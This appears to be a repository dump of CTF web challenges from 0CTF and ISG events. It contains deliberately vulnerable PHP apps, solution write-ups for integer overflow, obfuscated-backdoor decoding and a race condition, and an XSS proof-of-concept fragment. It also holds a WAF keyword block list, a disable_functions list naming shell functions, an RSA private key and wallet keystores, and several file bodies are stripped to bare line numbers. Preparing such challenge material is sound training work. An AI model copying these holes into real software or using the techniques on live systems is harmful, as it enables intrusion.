├── .gitignore ├── 0ctf2017-qual ├── simplesqlin_100 │ ├── waf │ │ ├── init.lua │ │ └── waf.lua │ ├── install.sql │ └── nginx.conf ├── simplexss │ ├── preview.php │ ├── flag.php │ ├── function.php │ ├── run.py │ ├── run.php │ ├── readme.txt │ ├── index.php │ └── static │ │ └── bootstrap.min.js └── complicatedxss_500 │ ├── poc │ ├── 1.js │ └── 2.js │ ├── main │ ├── run.php │ ├── index.php │ └── static │ │ ├── i_dont_believe_you_can_guess_this_js.js.php │ │ └── bootstrap.min.js │ ├── run.js │ └── admin.py ├── 0ctf2018-final └── zerolottery │ ├── base_chain │ ├── data │ │ ├── geth │ │ │ ├── LOCK │ │ │ ├── chaindata │ │ │ │ ├── LOCK │ │ │ │ ├── CURRENT │ │ │ │ ├── 000006.log │ │ │ │ ├── 000008.ldb │ │ │ │ ├── MANIFEST-000007 │ │ │ │ └── LOG │ │ │ ├── lightchaindata │ │ │ │ ├── LOCK │ │ │ │ ├── CURRENT │ │ │ │ ├── 000001.log │ │ │ │ ├── MANIFEST-000000 │ │ │ │ └── LOG │ │ │ ├── transactions.rlp │ │ │ └── nodekey │ │ └── keystore │ │ │ ├── UTC--2018-05-10T08-41-28.597885436Z--af98ff0461a8f7adf7021463715d0b75d83ed519 │ │ │ └── UTC--2018-05-10T08-42-44.098066136Z--ac9e27b1fabd55d3e85104d9feb945c57d99f43a │ ├── init.sh │ ├── nginx.conf │ ├── kill.sh │ ├── genesis.json │ ├── run.sh │ ├── automine.js │ └── flag.py │ ├── zerolottery.pptx │ ├── genesis.json │ ├── readme.md │ └── zerolottery.sol ├── ISG2014 ├── shop │ ├── fl11l444444ggg.txt │ ├── index.php │ └── ReadMe.txt ├── findshell │ ├── findshell │ │ ├── tthisiiisttheflllaaag.txt │ │ └── index.php │ └── Readme.txt ├── ReadMe.txt ├── safesite │ ├── Readme.txt │ ├── admin │ │ ├── config.php │ │ ├── index.php │ │ ├── login.php │ │ └── conn.php │ ├── main │ │ ├── static │ │ │ ├── theme.css │ │ │ └── bootstrap-theme.min.css │ │ └── index.php │ └── install.sql └── X-Area │ ├── Readme.txt │ └── index.php ├── 0ctf2016-final ├── checker │ ├── secretagent.py │ ├── secretagent.pyc │ ├── public.pem │ ├── private.pem │ ├── rsa_ussage.py │ ├── rsa_flag.py │ ├── exp.py │ ├── README.md │ ├── 5alt_admin.py │ ├── reset_pwd.py │ ├── check_upload.py │ └── check_post.py ├── install.txt ├── z0ne.zip ├── 漏洞列表.txt └── z0ne.sh ├── 0ctf2016-qual ├── web500_xss │ ├── web500.zip │ ├── other_data.zip │ └── readme.md └── web200_Monkey │ ├── web200.zip │ ├── other_data.zip │ └── ReadMe.md ├── 0ctf2017-final └── uglyweb_3ad9c2c3ecc09bc9945492d64f3ea667.zip └── 0ctf2018-qual └── easy_ums ├── README.md ├── static ├── sticky-footer.css └── signin.css ├── config.php ├── index.php ├── verify.php ├── login.php ├── change.php ├── register.php └── common.php /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplesqlin_100/waf/init.lua: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/LOCK: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/LOCK: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/LOCK: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/transactions.rlp: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ISG2014/shop/fl11l444444ggg.txt: -------------------------------------------------------------------------------- 1 | ISG{Th3_sH0p_Is_C4l1inG_Th3_p0lic3_n0W!} -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/CURRENT: -------------------------------------------------------------------------------- 1 | MANIFEST-000007 2 | -------------------------------------------------------------------------------- /ISG2014/findshell/findshell/tthisiiisttheflllaaag.txt: -------------------------------------------------------------------------------- 1 | ISG{u_sUcCEssFuLlY_F1nd_YOuR_sHe11} -------------------------------------------------------------------------------- /0ctf2016-final/checker/secretagent.py: -------------------------------------------------------------------------------- 1 | def flag(service, teamid): 2 | return '0ctf{hello}' -------------------------------------------------------------------------------- /0ctf2016-final/install.txt: -------------------------------------------------------------------------------- 1 | ubuntu 14.04 2 | 3 | 把z0ne.sh和z0ne.zip放/root目录下,以root身份执行z0ne.sh -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/CURRENT: -------------------------------------------------------------------------------- 1 | MANIFEST-000000 2 | -------------------------------------------------------------------------------- /ISG2014/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/ISG2014/ReadMe.txt -------------------------------------------------------------------------------- /0ctf2016-final/z0ne.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-final/z0ne.zip -------------------------------------------------------------------------------- /ISG2014/shop/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/ISG2014/shop/index.php -------------------------------------------------------------------------------- /ISG2014/findshell/Readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/ISG2014/findshell/Readme.txt -------------------------------------------------------------------------------- /ISG2014/safesite/Readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/ISG2014/safesite/Readme.txt -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/nodekey: -------------------------------------------------------------------------------- 1 | 6a1c7b73e08d35a358570043ab6af1edc6c4b1df8cf84b3c470d77fa4e52170f -------------------------------------------------------------------------------- /0ctf2016-qual/web500_xss/web500.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-qual/web500_xss/web500.zip -------------------------------------------------------------------------------- /0ctf2016-final/checker/secretagent.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-final/checker/secretagent.pyc -------------------------------------------------------------------------------- /0ctf2016-qual/web200_Monkey/web200.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-qual/web200_Monkey/web200.zip -------------------------------------------------------------------------------- /0ctf2016-qual/web500_xss/other_data.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-qual/web500_xss/other_data.zip -------------------------------------------------------------------------------- /0ctf2016-qual/web200_Monkey/other_data.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-qual/web200_Monkey/other_data.zip -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/zerolottery.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/zerolottery.pptx -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/preview.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /0ctf2017-final/uglyweb_3ad9c2c3ecc09bc9945492d64f3ea667.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2017-final/uglyweb_3ad9c2c3ecc09bc9945492d64f3ea667.zip -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/000006.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/000006.log -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/000008.ldb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/000008.ldb -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/MANIFEST-000007: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/MANIFEST-000007 -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/000001.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/000001.log -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/MANIFEST-000000: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/MANIFEST-000000 -------------------------------------------------------------------------------- /ISG2014/safesite/admin/config.php: -------------------------------------------------------------------------------- 1 | p > .btn { 13 | margin: 5px 0; 14 | } 15 | 16 | .theme-showcase .navbar .container { 17 | width: auto; 18 | } 19 | -------------------------------------------------------------------------------- /ISG2014/shop/ReadMe.txt: -------------------------------------------------------------------------------- 1 | [题目名称] 2 | shop 3 | [题目描述] 4 | 我只有一块钱,但我想买好多好多东西 5 | [作者] 6 | md5_salt 7 | [建议分值] 8 | 200 9 | 10 | [出题意图] 11 | 主要考察php在处理订单时可能会产生的整数溢出问题。 12 | 13 | [题目分析] 14 | 由于在php的整数里,int(4294967297) === 1 15 | 因此只要利用价格凑出总价为4294967297的订单即可。 16 | MX4 1999 * 5 17 | iPhone5s 64G: 6990 * 1 18 | iPhone5s 32G: 6088 * 1 19 | Macbook Pro Retina 15': 14288 * 300598 20 | -------------------------------------------------------------------------------- /ISG2014/X-Area/Readme.txt: -------------------------------------------------------------------------------- 1 | [题目名称] 2 | X-Area 3 | [题目描述] 4 | 限制区域,非请勿入! 5 | [作者] 6 | md5_salt 7 | [建议分值] 8 | 300 9 | 10 | [出题意图] 11 | 在代码审计中经常会遇到一些代码保护措施,有时候黑客留下的后门也经常以加密的形式存在。 12 | 此题主要考察对加密后php源码文件的解密能力。 13 | 14 | [题目分析] 15 | 首先需要通过Http基础认证,可以从最近泄露的GMail数据库中查到密码。 16 | 接下来可以查看源码得到经过base64加密后的php代码。将eval替换成echo,并按照加密的逻辑解密之后便可以得到写在注释里的flag。 17 | 18 | [题目答案] 19 | ISG{tHe_MaGic_pHP_S0UrCE_c0D3} 20 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/LOG: -------------------------------------------------------------------------------- 1 | =============== May 10, 2018 (CST) =============== 2 | 16:10:44.591777 log@legend F·NumFile S·FileSize N·Entry C·BadEntry B·BadBlock Ke·KeyError D·DroppedEntry L·Level Q·SeqNum T·TimeElapsed 3 | 16:10:44.592457 db@open opening 4 | 16:10:44.593485 version@stat F·[] S·0B[] Sc·[] 5 | 16:10:44.593759 db@janitor F·2 G·0 6 | 16:10:44.593778 db@open done T·1.309951ms 7 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/nginx.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | access_log /var/log/nginx/access.log; 5 | 6 | location / { 7 | proxy_read_timeout 300; 8 | proxy_connect_timeout 300; 9 | 10 | if ($remote_addr ~* '192.168.1(\d{2}).\d{1,3}') { 11 | proxy_pass http://127.0.0.1:80$1; 12 | break; 13 | } 14 | } 15 | } -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/function.php: -------------------------------------------------------------------------------- 1 | /;&#,.:[]{}?%@!$'); 5 | return str_replace($bad, '', $str); 6 | } 7 | 8 | function add_html($str){ 9 | $t = << 11 | 12 | 13 | XSS Test Page 14 | 15 | 16 |

17 | %s 18 |

19 | 20 | EOF; 21 | return sprintf($t, $str); 22 | } 23 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/kill.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | kill_session(){ 3 | cmd=$(which tmux) 4 | session="data$1" 5 | 6 | run_session="run_$session" 7 | mine_session="mine_$session" 8 | 9 | $cmd kill-session -t $run_session 10 | $cmd kill-session -t $mine_session 11 | } 12 | 13 | 14 | for ((i=1; i<=12; i++)); do 15 | kill_session $i 16 | done 17 | 18 | for ((i=21; i<=35; i++)); do 19 | kill_session $i 20 | done -------------------------------------------------------------------------------- /ISG2014/safesite/install.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE `isg_admin` ( 2 | `uid` int(10) unsigned NOT NULL auto_increment, 3 | `username` varchar(32) default NULL, 4 | `password` varchar(64) default NULL, 5 | `info` varchar(200) default NULL, 6 | PRIMARY KEY (`uid`) 7 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 8 | 9 | INSERT INTO `isg_admin`(`username`, `password`, `info`) VALUES('admin', '86c969bebab9cfeb47efcc65d85f26c5', 'login and capture the flag!'); -------------------------------------------------------------------------------- /0ctf2017-qual/simplesqlin_100/waf/waf.lua: -------------------------------------------------------------------------------- 1 | function say_html() 2 | html=[[ 3 | Your request is blocked by waf. 4 | ]] 5 | ngx.header.content_type = "text/html" 6 | ngx.status = ngx.HTTP_FORBIDDEN 7 | ngx.say(html) 8 | ngx.exit(ngx.status) 9 | end 10 | 11 | function url() 12 | rule = "(select|where|from|delete|update|insert|sleep|benchmark)" 13 | if rule ~="" and ngx.re.match(ngx.unescape_uri(ngx.var.request_uri),rule,"isjo") then 14 | say_html() 15 | return true 16 | end 17 | 18 | return false 19 | end 20 | url() 21 | -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/poc/1.js: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/keystore/UTC--2018-05-10T08-41-28.597885436Z--af98ff0461a8f7adf7021463715d0b75d83ed519: -------------------------------------------------------------------------------- 1 | {"address":"af98ff0461a8f7adf7021463715d0b75d83ed519","crypto":{"cipher":"aes-128-ctr","ciphertext":"a6f784d01f0a2732ca862278561513ad7dcf3ba1592bb325b7f6fe4394b38174","cipherparams":{"iv":"f9ed34a4f42eae1959cf02ac14e1c144"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"88ca4a87bd130d9e381d3f30ffec58edce1a4007bf91bc5091530d0e57944311"},"mac":"864afd70f635d99ab3580cbfa51e8624a9b501d2fc8796a22f41141826106193"},"id":"cc408e2d-0761-44f1-b389-443c5a5d2304","version":3} -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/keystore/UTC--2018-05-10T08-42-44.098066136Z--ac9e27b1fabd55d3e85104d9feb945c57d99f43a: -------------------------------------------------------------------------------- 1 | {"address":"ac9e27b1fabd55d3e85104d9feb945c57d99f43a","crypto":{"cipher":"aes-128-ctr","ciphertext":"124439d211e1f150263b72a39e3315854771e76692d21e1f3250526d378464e1","cipherparams":{"iv":"aeb9dc2b9d7caf69266335601da59bf1"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"760ee818dca12b20efaaa32e222c5dab86e54fc8ce7d108c4e2a97a82d126024"},"mac":"e5a648f5c4574080551fad6e7b2194c118a2960e0d55afbf88a0a404fb21eb42"},"id":"99e3f212-1fb7-4747-8c66-ee82447c633c","version":3} -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/README.md: -------------------------------------------------------------------------------- 1 | # Easy User Manage System 2 | 3 | ## exploit 4 | Register a user, login in two separate browsers. In one browser change phone to your vps and get the code, put into the verify page and wait. In the second browser, input 8.8.8.8 in the change phone page. Click change phone's submit and then quickly submit the verify code in the first browser, you will get the flag. 5 | 6 | ## explanation 7 | Values in session and database are not always the same. 8 | 9 | Actually there should be a hint. But it was solved by one team within an hour, it's unfaire to release any hints then. 10 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/genesis.json: -------------------------------------------------------------------------------- 1 | { 2 | "config": { 3 | "chainId": 1337, 4 | "homesteadBlock": 0, 5 | "eip155Block": 0, 6 | "eip158Block": 0 7 | }, 8 | "alloc" : { 9 | "0x0000000000000000000000000000000000000001": {"balance": "0"} 10 | }, 11 | "coinbase" : "0x0000000000000000000000000000000000000000", 12 | "difficulty" : "0x0", 13 | "extraData" : "", 14 | "gasLimit" : "0x2fefd8", 15 | "nonce" : "0x00000000deadbeef", 16 | "mixhash" : "0x0000000000000000000000000000000000000000000000000000000000000000", 17 | "parentHash" : "0x0000000000000000000000000000000000000000000000000000000000000000", 18 | "timestamp" : "0x00" 19 | } -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/genesis.json: -------------------------------------------------------------------------------- 1 | { 2 | "config": { 3 | "chainId": 1337, 4 | "homesteadBlock": 0, 5 | "eip155Block": 0, 6 | "eip158Block": 0 7 | }, 8 | "alloc" : { 9 | "0x0000000000000000000000000000000000000001": {"balance": "0"} 10 | }, 11 | "coinbase" : "0x0000000000000000000000000000000000000000", 12 | "difficulty" : "0x0", 13 | "extraData" : "", 14 | "gasLimit" : "0x2fefd8", 15 | "nonce" : "0x00000000deadbeef", 16 | "mixhash" : "0x0000000000000000000000000000000000000000000000000000000000000000", 17 | "parentHash" : "0x0000000000000000000000000000000000000000000000000000000000000000", 18 | "timestamp" : "0x00" 19 | } -------------------------------------------------------------------------------- /0ctf2017-qual/simplesqlin_100/install.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE `news` ( 2 | `id` int(11) NOT NULL AUTO_INCREMENT, 3 | `title` varchar(255) COLLATE utf8_bin NOT NULL, 4 | `content` TEXT COLLATE utf8_bin NOT NULL, 5 | PRIMARY KEY (`id`) 6 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 7 | 8 | CREATE TABLE `flag` ( 9 | `flag` varchar(255) COLLATE utf8_bin NOT NULL, 10 | PRIMARY KEY (`flag`) 11 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 12 | 13 | INSERT INTO `flag` VALUES('flag{W4f_bY_paSS_f0R_CI}'); 14 | 15 | INSERT INTO `news`(`title`, `content`) VALUES('Hello World', 'Hello guys, flag is in the database'), 16 | ('Waf', 'wtf, the waf blocks some keywords'), 17 | ('Sqlin', 'you should solve this game by sqlin'), 18 | ('darkness', 'hello darkness my old friend'); -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/static/sticky-footer.css: -------------------------------------------------------------------------------- 1 | /* Sticky footer styles 2 | -------------------------------------------------- */ 3 | html { 4 | position: relative; 5 | min-height: 100%; 6 | } 7 | body { 8 | margin-bottom: 60px; /* Margin bottom by footer height */ 9 | } 10 | .footer { 11 | position: absolute; 12 | bottom: 0; 13 | width: 100%; 14 | height: 60px; /* Set the fixed height of the footer here */ 15 | line-height: 60px; /* Vertically center the text there */ 16 | background-color: #f5f5f5; 17 | } 18 | 19 | 20 | /* Custom page CSS 21 | -------------------------------------------------- */ 22 | /* Not required for template or sticky footer method. */ 23 | 24 | .container { 25 | width: auto; 26 | max-width: 680px; 27 | padding: 0 15px; 28 | } 29 | -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/config.php: -------------------------------------------------------------------------------- 1 | 20 | 21 | 22 | 23 | 后台管理 24 | 25 | 26 |

管理登录

27 |
28 | 用户名:
29 | 密码:
30 | 31 |
32 | 33 | 34 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/private.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICYQIBAAKBgQCYtMrW3WSwvKYA/w0H0zECtY+CWZYLoL2BgnHaqKJOAoxfIDfB 3 | XVHB8Ie7v8vhjfQbpeTgJEy48YdAWVinGaR8VOaT+rPNOCvrEFnMvyYdscormA2a 4 | sJZBpT5xJAIM3JuByErkhv2zKcFG/bNqwKLLVXVHPpnneuGxUC9T0Vdl3QIDAQAB 5 | AoGAOd6pz+tusRuMvWvqgECkniY4EGnq1tU/e8j3ZKnreCy3DYWkG39F8H06swfo 6 | N74X+DJSHi8jdCLz4or5LnoE8WSQQs5qGsPQBikTk7zQzPshRqUKRUVPYZMsAoGs 7 | 1Fbkw7PpQh15hLLpISMcbyQpMCUz9wGIsTproXe2g6LOX4ECRQCxdQ50PCU2r17F 8 | xAHeecT7ThSzBSksy/co1FTfEtv11NeFjjObDtjlLCx10a8CldFdT9iK3P7vfg9x 9 | X7pzsKtv0v+aBQI9ANxLTKL/wRJwYY9Q5++vnF/kxiYvNqv6cleyRXKNnk5FYI1a 10 | E8ZcheyAd6wRZuWfJdjk++RImOCVWnjr+QJECK+6LWZkS/D5qqSVktZTFhoUWU7/ 11 | XPn+9zitjt3VdoscoaT8UbLAWzd2Va4V6wJ6ZR7rcqCuufpptxsAfXlAaxDhAiEC 12 | PQCVrNO1K/AShyjCJ0ZvI/IrdVTsPMf4sYFe9FEbM/2LULf5Ump9LAASYHbvAiPX 13 | f/pHE83RnUHB1bhS0IECRQCwQLBaf5RVVdNf6iKt4Gxhq3+P7+/QRj5p5/d1gfF+ 14 | crPay+CMPcCRV0myxNwKQI3i+z8zJNVtWA0gJwn8Tm6nMfTg4g== 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | start_game(){ 3 | cmd=$(which tmux) 4 | session="data$1" 5 | let "rpcport=8000+$1" 6 | let "p2pport=3000+$1" 7 | run_session="run_$session" 8 | mine_session="mine_$session" 9 | 10 | $cmd has-session -t $run_session > /dev/null 11 | 12 | if [ $? != 0 ]; then 13 | $cmd new-session -s $run_session -d 14 | $cmd send-keys -t $run_session "HOME=team_data/$session geth --datadir team_data/$session --networkid 1337 --rpc --rpcaddr 127.0.0.1 --rpcport $rpcport --rpcapi='eth,personal' --nodiscover --port $p2pport" C-m 15 | $cmd new-session -s $mine_session -d 16 | $cmd send-keys -t $mine_session "sleep 5; HOME=team_data/$session geth --preload ./automine.js attach $(pwd)/team_data/$session/geth.ipc console" C-m 17 | fi 18 | } 19 | 20 | for ((i=1; i<=12; i++)); do 21 | start_game $i 22 | done 23 | 24 | for ((i=21; i<=35; i++)); do 25 | start_game $i 26 | done 27 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/automine.js: -------------------------------------------------------------------------------- 1 | var minimum_confirmations = 12; 2 | var mining_threads = 10 3 | var txBlock = 0 4 | function checkWork() { 5 | if (eth.getBlock("pending").transactions.length > 0) { 6 | txBlock = eth.getBlock("pending").number 7 | if (eth.mining) return; 8 | console.log(" Transactions pending. Mining..."); 9 | miner.start(mining_threads) 10 | interval = setInterval(function () { 11 | if (eth.getBlock("latest").number < txBlock + minimum_confirmations) { 12 | if (eth.getBlock("pending").transactions.length > 0) txBlock = eth.getBlock("pending").number; 13 | } else { 14 | console.log(minimum_confirmations + " confirmations achieved; mining stopped."); 15 | miner.stop() 16 | clearInterval(interval); 17 | } 18 | }, 600) 19 | } 20 | } 21 | 22 | eth.filter("latest", function (err, block) { checkWork(); }); 23 | eth.filter("pending", function (err, block) { checkWork(); }); 24 | 25 | checkWork(); -------------------------------------------------------------------------------- /0ctf2016-final/checker/rsa_ussage.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | __author__ = 'luchanghong' 3 | import rsa 4 | 5 | #http://www.aikaiyuan.com/5204.html 6 | ''' 7 | # 先生成一对密钥,然后保存.pem格式文件,当然也可以直接使用 8 | (pubkey, privkey) = rsa.newkeys(1024) 9 | 10 | pub = pubkey.save_pkcs1() 11 | pubfile = open('public.pem','w+') 12 | pubfile.write(pub) 13 | pubfile.close() 14 | 15 | pri = privkey.save_pkcs1() 16 | prifile = open('private.pem','w+') 17 | prifile.write(pri) 18 | prifile.close() 19 | ''' 20 | # load公钥和密钥 21 | message = 'hello' 22 | with open('public.pem') as publickfile: 23 | p = publickfile.read() 24 | pubkey = rsa.PublicKey.load_pkcs1(p) 25 | 26 | with open('private.pem') as privatefile: 27 | p = privatefile.read() 28 | privkey = rsa.PrivateKey.load_pkcs1(p) 29 | 30 | # 用公钥加密、再用私钥解密 31 | crypto = rsa.encrypt(message, pubkey) 32 | print crypto.encode('hex') 33 | message = rsa.decrypt(crypto, privkey) 34 | print message 35 | 36 | # sign 用私钥签名认真、再用公钥验证签名 37 | signature = rsa.sign(message, privkey, 'SHA-1') 38 | print signature.encode('hex') 39 | print rsa.verify('hello', signature, pubkey) 40 | -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/index.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | hello 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 |

Hello

30 |

You can change your phone here.

31 |

If you make your phone to be 8.8.8.8, I will give you a flag.

32 | ".$flag."

"; 35 | } ?> 36 |
37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /0ctf2016-qual/web500_xss/readme.md: -------------------------------------------------------------------------------- 1 | apt-get install nginx 2 | apt-get install mysql-server 3 | apt-get install redis-server 4 | apt-get install php5 5 | apt-get install php5-fpm 6 | apt-get install php5-curl 7 | apt-get install php5-mysql 8 | apt-get install php5-redis 9 | apt-get install mailutils 10 | 11 | 12 | 13 | apt-get install unzip 14 | apt-get install phantomjs 15 | apt-get install python-pip 16 | apt-get install python-dev libmysqlclient-dev 17 | pip install MySQL-python 18 | 19 | 20 | /etc/php5/fpm/php.ini 21 | 22 | disable_functions 23 | passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server 24 | 25 | open_basedir /usr/share/nginx/html:/tmp/:/proc/ 26 | 27 | session.save_handler = redis 28 | session.save_path = "tcp://127.0.0.1:6379" 29 | 30 | 31 | /etc/nginx/sites-enabled/default 32 | 33 | service php5-fpm restart 34 | 35 | 36 | cd /usr/share/nginx/html 37 | chown -R root:www-data * 38 | chmod -R 650 * 39 | chmod 777 uploads 40 | 41 | 42 | 设置iptables允许服务器访问外面的脚本! -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/poc/2.js: -------------------------------------------------------------------------------- 1 | function ss(){ 2 | var aaa = document.getElementById('aaa') 3 | Function = aaa.contentWindow.Function;XMLHttpRequest = aaa.contentWindow.XMLHttpRequest;Image = aaa.contentWindow.Image;alert = aaa.contentWindow.alert; 4 | XMLHttpRequest.prototype.sendAsBinary||(XMLHttpRequest.prototype.sendAsBinary=function(a){for(var d=a.length,c=new Uint8Array(d),b=0;b /dev/null &"); 17 | } 18 | } 19 | //check task first 20 | if(!$_SESSION['task']) die('please get your work!'); 21 | if(substr(md5($_POST['task']), 0, 6) !== $_SESSION['task']) die('prove your work first!'); 22 | $_SESSION['task'] = genTasks(); 23 | $payload = $_POST['payload']; 24 | 25 | $filename = 'data/'.bin2hex(file_get_contents('/dev/urandom', NULL, NULL, 0, 16)).".html"; 26 | file_put_contents($filename, $payload); 27 | 28 | $url = 'http://government.vip/'.$filename; 29 | 30 | execInBackground($phantomjs.' '.$run.' '.$url); 31 | 32 | echo "processing..."; 33 | 34 | ?> 35 | -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/static/signin.css: -------------------------------------------------------------------------------- 1 | html, 2 | body { 3 | height: 100%; 4 | } 5 | 6 | body { 7 | display: -ms-flexbox; 8 | display: -webkit-box; 9 | display: flex; 10 | -ms-flex-align: center; 11 | -ms-flex-pack: center; 12 | -webkit-box-align: center; 13 | align-items: center; 14 | -webkit-box-pack: center; 15 | justify-content: center; 16 | padding-top: 40px; 17 | padding-bottom: 40px; 18 | background-color: #f5f5f5; 19 | } 20 | 21 | .form-signin { 22 | width: 100%; 23 | max-width: 330px; 24 | padding: 15px; 25 | margin: 0 auto; 26 | } 27 | .form-signin .checkbox { 28 | font-weight: 400; 29 | } 30 | .form-signin .form-control { 31 | position: relative; 32 | box-sizing: border-box; 33 | height: auto; 34 | padding: 10px; 35 | font-size: 16px; 36 | } 37 | .form-signin .form-control:focus { 38 | z-index: 2; 39 | } 40 | .form-signin input[type="email"] { 41 | margin-bottom: -1px; 42 | border-bottom-right-radius: 0; 43 | border-bottom-left-radius: 0; 44 | } 45 | .form-signin input[type="password"] { 46 | margin-bottom: 10px; 47 | border-top-left-radius: 0; 48 | border-top-right-radius: 0; 49 | } 50 | -------------------------------------------------------------------------------- /ISG2014/findshell/findshell/index.php: -------------------------------------------------------------------------------- 1 | 6 | 7 |
8 | File: 9 | 10 |
11 |
12 | 13 | 0) 17 | { 18 | die("Return Code: " . $_FILES["file"]["error"] . "
"); 19 | } 20 | else if($_FILES["file"]["size"] > 20000) 21 | { 22 | die("The file is too large."); 23 | } 24 | else 25 | { 26 | $upload_dir = './tmp/'; 27 | $rand = mt_rand(); 28 | $filename = md5($_FILES["file"]["name"]).sha1($rand); 29 | 30 | if (file_exists($upload_dir . $filename)) 31 | { 32 | die("File already exists. "); 33 | } 34 | else 35 | { 36 | file_put_contents($upload_dir . $filename, file_get_contents('tthisiiisttheflllaaag.txt')); 37 | die("Uplad success!"); 38 | } 39 | } 40 | die(); 41 | } 42 | ?> -------------------------------------------------------------------------------- /ISG2014/safesite/admin/conn.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/run.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os, shutil 3 | import time 4 | import json 5 | 6 | data_dir = '/var/www/html/data/' 7 | backup_dir = "/root/backup/" 8 | base_url = 'https://router.vip/data/' 